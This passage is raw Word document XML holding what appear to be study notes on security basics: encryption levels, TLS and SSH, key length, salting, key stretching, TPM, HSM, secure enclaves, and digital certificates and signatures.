        <w:pStyle w:val="Listeavsnitt"/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Bit by bit</w:t>
      </w:r>
      <w:r w:rsidR="00EA2FB0" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> base</w:t>
      </w:r>
      <w:r w:rsidR="007B169E" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and encrypts each bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094E61B8" w14:textId="77777777" w:rsidR="00330819" w:rsidRPr="005B4891" w:rsidRDefault="00330819" w:rsidP="00C272A7">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/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74A6B5C0" w14:textId="77777777" w:rsidR="000F6318" w:rsidRPr="005B4891" w:rsidRDefault="000F6318" w:rsidP="00C272A7">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/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5F2472C9" w14:textId="77777777" w:rsidR="000F6318" w:rsidRPr="005B4891" w:rsidRDefault="000F6318" w:rsidP="00C272A7">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/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08A89253" w14:textId="77777777" w:rsidR="000F6318" w:rsidRPr="005B4891" w:rsidRDefault="000F6318" w:rsidP="00C272A7">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/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5CF66726" w14:textId="77777777" w:rsidR="000F6318" w:rsidRPr="005B4891" w:rsidRDefault="000F6318" w:rsidP="00C272A7">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/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75CE9E07" w14:textId="77777777" w:rsidR="000F6318" w:rsidRPr="005B4891" w:rsidRDefault="000F6318" w:rsidP="00C272A7">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/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0ED142F0" w14:textId="77777777" w:rsidR="00A05553" w:rsidRDefault="00A05553" w:rsidP="008B53A3">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/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349FEDE7" w14:textId="0D6FA31D" w:rsidR="008A3410" w:rsidRPr="005B4891" w:rsidRDefault="008B53A3" w:rsidP="008B53A3">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/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Encryption Levels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</w:tblGrid>
      <w:tr w:rsidR="008B53A3" w:rsidRPr="005B4891" w14:paraId="0B1150A4" w14:textId="77777777" w:rsidTr="008B53A3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59F4453E" w14:textId="4BA01A98" w:rsidR="008B53A3" w:rsidRPr="005B4891" w:rsidRDefault="008B53A3" w:rsidP="00520960">
            <w:pPr>
              <w:pStyle w:val="Listeavsnitt"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="2902"/>
                <w:tab w:val="left" w:pos="5118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Full-disk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B53A3" w:rsidRPr="005B4891" w14:paraId="283EAC19" w14:textId="77777777" w:rsidTr="008B53A3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="324F5362" w14:textId="37E6002D" w:rsidR="008B53A3" w:rsidRPr="005B4891" w:rsidRDefault="008B53A3" w:rsidP="00520960">
            <w:pPr>
              <w:pStyle w:val="Listeavsnitt"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="2902"/>
                <w:tab w:val="left" w:pos="5118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Partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B53A3" w:rsidRPr="005B4891" w14:paraId="14AB84F1" w14:textId="77777777" w:rsidTr="008B53A3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="075CF83A" w14:textId="305E76F9" w:rsidR="008B53A3" w:rsidRPr="005B4891" w:rsidRDefault="008B53A3" w:rsidP="00520960">
            <w:pPr>
              <w:pStyle w:val="Listeavsnitt"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="2902"/>
                <w:tab w:val="left" w:pos="5118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File</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B53A3" w:rsidRPr="005B4891" w14:paraId="12AF068E" w14:textId="77777777" w:rsidTr="008B53A3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1317CA0D" w14:textId="54BFB9D1" w:rsidR="008B53A3" w:rsidRPr="005B4891" w:rsidRDefault="008B53A3" w:rsidP="00520960">
            <w:pPr>
              <w:pStyle w:val="Listeavsnitt"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="2902"/>
                <w:tab w:val="left" w:pos="5118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Volume</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B53A3" w:rsidRPr="005B4891" w14:paraId="5D4F8A52" w14:textId="77777777" w:rsidTr="008B53A3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F9B210B" w14:textId="264F5D42" w:rsidR="008B53A3" w:rsidRPr="005B4891" w:rsidRDefault="008B53A3" w:rsidP="00520960">
            <w:pPr>
              <w:pStyle w:val="Listeavsnitt"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="2902"/>
                <w:tab w:val="left" w:pos="5118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Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B53A3" w:rsidRPr="005B4891" w14:paraId="23940338" w14:textId="77777777" w:rsidTr="008B53A3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F7A5822" w14:textId="0A337DB5" w:rsidR="008B53A3" w:rsidRPr="005B4891" w:rsidRDefault="008B53A3" w:rsidP="00520960">
            <w:pPr>
              <w:pStyle w:val="Listeavsnitt"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="2902"/>
                <w:tab w:val="left" w:pos="5118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Record</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41B6740B" w14:textId="77777777" w:rsidR="008B53A3" w:rsidRPr="005B4891" w:rsidRDefault="008B53A3" w:rsidP="00C272A7">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/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7A919459" w14:textId="4FEF5F35" w:rsidR="005B4F85" w:rsidRPr="005B4891" w:rsidRDefault="00C120BB" w:rsidP="00C272A7">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/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Secure communication and transport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6478C487" w14:textId="3EFE56C4" w:rsidR="00C120BB" w:rsidRPr="005B4891" w:rsidRDefault="000A79C8" w:rsidP="00C272A7">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/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TLS = 3</w:t>
      </w:r>
      <w:r w:rsidR="00193CA7" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>way handshake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CEF77B" w14:textId="20831AA5" w:rsidR="000A79C8" w:rsidRPr="005B4891" w:rsidRDefault="000A79C8" w:rsidP="00C272A7">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/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SSH &gt; Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D1B425" w14:textId="1DC7C7DB" w:rsidR="00520960" w:rsidRPr="005B4891" w:rsidRDefault="005D0134" w:rsidP="001D1BE1">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/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Secure LDAP &gt; LDA</w:t>
      </w:r>
      <w:r w:rsidR="00AD2E2A" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793D0A95" w14:textId="77777777" w:rsidR="00520960" w:rsidRPr="005B4891" w:rsidRDefault="00520960" w:rsidP="00594705">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/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26E54166" w14:textId="7D38115F" w:rsidR="00EB32EF" w:rsidRPr="005B4891" w:rsidRDefault="00EB32EF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Key Length</w:t>
      </w:r>
      <w:r w:rsidR="00BD1BA0" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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32EF" w:rsidRPr="005B4891" w14:paraId="072B2B47" w14:textId="77777777" w:rsidTr="00EB32EF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BFCD5D3" w14:textId="15445E95" w:rsidR="00EB32EF" w:rsidRPr="005B4891" w:rsidRDefault="00EB32EF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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Small</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DA3FCEF" w14:textId="6D312854" w:rsidR="00EB32EF" w:rsidRPr="005B4891" w:rsidRDefault="00EB32EF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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Large</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB32EF" w:rsidRPr="005B4891" w14:paraId="4D887E19" w14:textId="77777777" w:rsidTr="00EB32EF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E27FD17" w14:textId="2B48863A" w:rsidR="00EB32EF" w:rsidRPr="005B4891" w:rsidRDefault="00EB32EF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Weaker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F251AF7" w14:textId="16BC40CA" w:rsidR="00EB32EF" w:rsidRPr="005B4891" w:rsidRDefault="00EB32EF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Stronger</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EB32EF" w:rsidRPr="005B4891" w14:paraId="4575675F" w14:textId="77777777" w:rsidTr="00EB32EF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="085A7567" w14:textId="5E4F80DA" w:rsidR="00EB32EF" w:rsidRPr="005B4891" w:rsidRDefault="007647D8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Less CPU</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1156AE9D" w14:textId="50F789C2" w:rsidR="00EB32EF" w:rsidRPr="005B4891" w:rsidRDefault="007647D8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More CPU</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007647D8" w:rsidRPr="005B4891" w14:paraId="70AC0E47" w14:textId="77777777" w:rsidTr="00EB32EF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40298230" w14:textId="2ACE15DA" w:rsidR="007647D8" w:rsidRPr="005B4891" w:rsidRDefault="007647D8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Faster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1374534B" w14:textId="4AC9BF2D" w:rsidR="007647D8" w:rsidRPr="005B4891" w:rsidRDefault="007647D8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Slower</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5335B8D0" w14:textId="77777777" w:rsidR="00EB32EF" w:rsidRPr="005B4891" w:rsidRDefault="00EB32EF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668C32A4" w14:textId="77777777" w:rsidR="005B41C3" w:rsidRPr="005B4891" w:rsidRDefault="005B41C3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15C55350" w14:textId="77777777" w:rsidR="001D1BE1" w:rsidRPr="005B4891" w:rsidRDefault="001D1BE1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542BCFBD" w14:textId="77777777" w:rsidR="001D1BE1" w:rsidRPr="005B4891" w:rsidRDefault="001D1BE1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761494D0" w14:textId="77777777" w:rsidR="001D1BE1" w:rsidRPr="005B4891" w:rsidRDefault="001D1BE1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5C62DF9B" w14:textId="77777777" w:rsidR="001D1BE1" w:rsidRPr="005B4891" w:rsidRDefault="001D1BE1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3DF6611F" w14:textId="77777777" w:rsidR="001D1BE1" w:rsidRPr="005B4891" w:rsidRDefault="001D1BE1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720D7D5E" w14:textId="77777777" w:rsidR="001D1BE1" w:rsidRPr="005B4891" w:rsidRDefault="001D1BE1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3CE79F19" w14:textId="77777777" w:rsidR="001D1BE1" w:rsidRPr="005B4891" w:rsidRDefault="001D1BE1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514BF87C" w14:textId="77777777" w:rsidR="00A05553" w:rsidRDefault="00A05553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771C97C1" w14:textId="2FA4688F" w:rsidR="007647D8" w:rsidRPr="005B4891" w:rsidRDefault="00255C47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lastRenderedPageBreak/>
        <w:t>Salting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028B18E0" w14:textId="0EE1B0EE" w:rsidR="00255C47" w:rsidRPr="005B4891" w:rsidRDefault="00255C47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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="034D658C" wp14:editId="4EB369F8">
            <wp:extent cx="5760720" cy="1598930"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="762583404" name="Bilde 1" descr="Et bilde som inneholder tekst, Font, diagram, hvi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83404" name="Bilde 1" descr="Et bilde som inneholder tekst, Font, diagram, hvit&#10;&#10;KI-generert innhold kan være feil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1148" w14:textId="77777777" w:rsidR="008B7DCE" w:rsidRPr="005B4891" w:rsidRDefault="008B7DCE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2F954754" w14:textId="46371A4A" w:rsidR="008B7DCE" w:rsidRPr="005B4891" w:rsidRDefault="008B7DCE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Key stretching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3651E07C" w14:textId="11B50EFD" w:rsidR="008B7DCE" w:rsidRPr="005B4891" w:rsidRDefault="008B7DCE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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A0CB63B" wp14:editId="017D6CD4">
            <wp:extent cx="5760720" cy="1489710"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1879002284" name="Bilde 1" descr="Et bilde som inneholder tekst, kvittering, Font, skjermbild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02284" name="Bilde 1" descr="Et bilde som inneholder tekst, kvittering, Font, skjermbilde&#10;&#10;KI-generert innhold kan være feil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4A5E" w14:textId="77777777" w:rsidR="00B779D8" w:rsidRPr="005B4891" w:rsidRDefault="00B779D8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392B2E37" w14:textId="3E129B48" w:rsidR="00B779D8" w:rsidRPr="005B4891" w:rsidRDefault="00B779D8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TPM =</w:t>
      </w:r>
      <w:r w:rsidR="00B56A2A" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F005C5" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Trusted Platform Module. </w:t>
      </w:r>
      <w:r w:rsidR="00B56A2A" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Built into the machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48950F04" w14:textId="012B5E12" w:rsidR="00B56A2A" w:rsidRPr="005B4891" w:rsidRDefault="00B56A2A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 xml:space="preserve">HSM = </w:t>
      </w:r>
      <w:r w:rsidR="00F005C5" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hardware Security Module Key. Rotation and certificate storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395F3A03" w14:textId="1025DECA" w:rsidR="00AD2398" w:rsidRPr="005B4891" w:rsidRDefault="00AD2398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 xml:space="preserve">Secure Enclave = </w:t>
      </w:r>
      <w:r w:rsidR="003B6CC1" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Isolated aera </w:t>
      </w:r>
      <w:r w:rsidR="00FE10B4" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">within your operating </w:t>
      </w:r>
      <w:r w:rsidR="003B6CC1" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidR="00FE10B4" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> that stores security information and can only be accessed by the system in a secure </w:t>
      </w:r>
      <w:r w:rsidR="00BF12EA" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>manner. For</w:t>
      </w:r>
      <w:r w:rsidR="00000D40" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> example, virtualization, sandboxing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6E4A3F" w14:textId="77777777" w:rsidR="000910D5" w:rsidRPr="005B4891" w:rsidRDefault="000910D5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2035BBBB" w14:textId="77777777" w:rsidR="000910D5" w:rsidRPr="005B4891" w:rsidRDefault="000910D5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7EB95485" w14:textId="77777777" w:rsidR="000910D5" w:rsidRPr="005B4891" w:rsidRDefault="000910D5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5773AFC1" w14:textId="77777777" w:rsidR="000910D5" w:rsidRPr="005B4891" w:rsidRDefault="000910D5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7A04838F" w14:textId="77777777" w:rsidR="00DF0830" w:rsidRPr="005B4891" w:rsidRDefault="00DF0830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5E30585F" w14:textId="77777777" w:rsidR="005B41C3" w:rsidRPr="005B4891" w:rsidRDefault="005B41C3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4727F899" w14:textId="77777777" w:rsidR="005B41C3" w:rsidRPr="005B4891" w:rsidRDefault="005B41C3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6E095A32" w14:textId="7A0A977E" w:rsidR="00903040" w:rsidRPr="005B4891" w:rsidRDefault="000910D5" w:rsidP="001D1BE1">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc198019360"/>
      <w:r w:rsidRPr="005B4891">
        <w:lastRenderedPageBreak/>
        <w:t>Digital certificates</w:t>
      </w:r>
      <w:r w:rsidR="00903040" w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> and signatures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="6EB9DB84" w14:textId="4744555A" w:rsidR="00903040" w:rsidRPr="005B4891" w:rsidRDefault="00AE5B59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 xml:space="preserve">Digital certificate is basically just a digital </w:t>
      </w:r>
      <w:r w:rsidR="00D90878" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>driver’s</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> license</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041D5C91" w14:textId="0E790C0F" w:rsidR="0096734E" w:rsidRPr="005B4891" w:rsidRDefault="00356600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CSR = Certificate Signing Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F89D1B9" w14:textId="40DD8731" w:rsidR="00D81FBB" w:rsidRPr="005B4891" w:rsidRDefault="00D81FBB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 xml:space="preserve">Digital </w:t>
      </w:r>
      <w:r w:rsidR="00FB04BB" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>signature</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses private </w:t>
      </w:r>
      <w:r w:rsidR="00A91AD6" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>keys</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00FB04BB" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>generate a unique value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC3C4D4" w14:textId="2F4CB571" w:rsidR="0096734E" w:rsidRPr="005B4891" w:rsidRDefault="0096734E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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7360A7BD" wp14:editId="2AC42E47">
            <wp:extent cx="5760720" cy="1276985"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="267212460" name="Bilde 1" descr="Et bilde som inneholder tekst, skjermbild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12460" name="Bilde 1" descr="Et bilde som inneholder tekst, skjermbilde&#10;&#10;KI-generert innhold kan være feil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54AB" w14:textId="3E3EAF40" w:rsidR="00261E5D" w:rsidRPr="005B4891" w:rsidRDefault="000C703C" w:rsidP="000C703C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6381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Certificates</w:t>
      </w:r>
      <w:r w:rsidR="00076D48" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="005B010C" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>X.</w:t>
      </w:r>
      <w:r w:rsidR="00076D48" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>509 I</w:t>
      </w:r>
      <w:r w:rsidR="00C010E8" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ETF </w:t>
      </w:r>
      <w:r w:rsidR="00076D48" w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>STANDARD)</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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1B25" w:rsidRPr="005B4891" w14:paraId="6FA88818" w14:textId="77777777" w:rsidTr="00F71B25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A8651AE" w14:textId="6C96763D" w:rsidR="00F71B25" w:rsidRPr="005B4891" w:rsidRDefault="00F71B25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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>PKCS#/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DF874DF" w14:textId="12B13C8B" w:rsidR="00F71B25" w:rsidRPr="005B4891" w:rsidRDefault="00F71B25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891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>PKCS#12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F71B25" w:rsidRPr="005B4891" w14:paraId="19611C49" w14:textId="77777777" w:rsidTr="00F71B25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F79EEF1" w14:textId="106C0AC0" w:rsidR="00F71B25" w:rsidRPr="005B4891" w:rsidRDefault="00F71B25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Sec</w:t>
            </w:r>
            <w:r w:rsidR="002C0FEC" w:rsidRPr="005B4891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>uring email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73D04E84" w14:textId="511ED620" w:rsidR="00F71B25" w:rsidRPr="005B4891" w:rsidRDefault="002C0FEC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Secure authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F71B25" w:rsidRPr="005B4891" w14:paraId="79B31117" w14:textId="77777777" w:rsidTr="00F71B25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D86D996" w14:textId="6DD88D57" w:rsidR="00F71B25" w:rsidRPr="005B4891" w:rsidRDefault="002C0FEC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Code signing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79562AC0" w14:textId="49CDE105" w:rsidR="00F71B25" w:rsidRPr="005B4891" w:rsidRDefault="002C0FEC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Private keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F71B25" w:rsidRPr="005B4891" w14:paraId="13A685DE" w14:textId="77777777" w:rsidTr="00F71B25">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65A39D9C" w14:textId="46C18FE7" w:rsidR="00F71B25" w:rsidRPr="005B4891" w:rsidRDefault="002C0FEC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Digital signatures</w:t>
            </w:r>
